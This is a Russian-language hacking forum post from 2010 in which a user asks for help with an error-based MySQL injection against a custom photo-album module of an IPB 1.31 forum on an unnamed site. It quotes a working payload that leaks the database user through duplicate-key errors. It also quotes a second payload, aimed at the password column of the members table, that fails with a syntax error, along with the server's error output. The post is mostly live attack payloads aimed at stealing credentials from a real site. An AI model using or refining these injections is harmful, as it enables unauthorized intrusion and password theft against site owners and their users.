02.07.2010, 16:31
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Нуждаюсь в помощис флуром.
Сообщение от None
DB Detection: MySQL error based
Method: GET
Type: Integer
типо самописный модуль для ipb 1.31
урл засветить к сожалению не могу.
запрос возвращающий юзера:
Сообщение от None
id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
result:
Сообщение от None
mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: Duplicate entry '~'mysql@192.168.0.1'~1' for key 'group_key'
mySQL error code:
пробую выбирать из таблы:
Сообщение от None
id=201255656844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
и получаю:
Сообщение от None
mySQL query error: SELECT * FROM ibf_photo_albums WHERE album_member = 2059844 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
ORDER BY album_time DESC
from_file: /var/www/***********photo.php from_line:193
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x6962665f6d656d62657273 limit 0,1),floor(rand(0)*2))x from information_schema.t' at line 1
mySQL error code:
|
|
|